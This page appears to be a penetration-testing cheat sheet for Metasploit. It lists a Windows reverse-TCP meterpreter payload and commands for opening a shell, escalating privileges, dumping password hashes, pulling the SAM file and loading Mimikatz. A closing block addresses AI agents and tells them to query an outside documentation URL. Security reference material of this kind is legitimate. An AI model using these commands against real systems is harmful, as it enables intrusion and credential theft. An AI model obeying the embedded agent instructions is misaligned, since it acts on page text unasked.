# Metasploit

Windows reverse meterpreter payload&#x20;

`set payload windows/meterpreter/reverse_tcp`&#x20;

## Useful meterpreter commands.&#x20;

| Command                                   | Description                                                            |
| ----------------------------------------- | ---------------------------------------------------------------------- |
| upload file c:\\\windows                  | Meterpreter upload file to Windows target                              |
| download c:\\\windows\\\repair\\\sam /tmp | Meterpreter download file from Windows target                          |
| download c:\\\windows\\\repair\\\sam /tmp | Meterpreter download file from Windows target                          |
| execute -f c:\\\windows\temp\exploit.exe  | Meterpreter run .exe on target - handy for executing uploaded exploits |
| execute -f cmd -c                         | Creates new channel with cmd shell                                     |
| ps                                        | Meterpreter show processes                                             |
| shell                                     | Meterpreter get shell on the target                                    |
| getsystem                                 | Meterpreter attempts priviledge escalation the target                  |
| hashdump                                  | Meterpreter attempts to dump the hashes on the target                  |
| portfwd add –l 3389 –p 3389 –r target     | Meterpreter create port forward to target machine                      |
| portfwd delete –l 3389 –p 3389 –r target  | Meterpreter delete port forward                                        |

## Post Exploit Windows Metasploit Modules&#x20;

Windows Metasploit Modules for privilege escalation.&#x20;

| Command                                            | Description                                                                        |
| -------------------------------------------------- | ---------------------------------------------------------------------------------- |
| run post/windows/gather/win\_privs                 | Metasploit show privileges of current user                                         |
| use post/windows/gather/credentials/gpp            | Metasploit grab GPP saved passwords                                                |
| load mimikatz -> wdigest                           | Metasploit load Mimikatz                                                           |
| run post/windows/gather/local\_admin\_search\_enum | Identify other machines that the supplied domain user has administrative access to |
| run post/windows/gather/smart\_hashdump            | dump credentials                                                                   |


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://infra.newerasec.com/infrastructure-testing/tools/metasploit.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.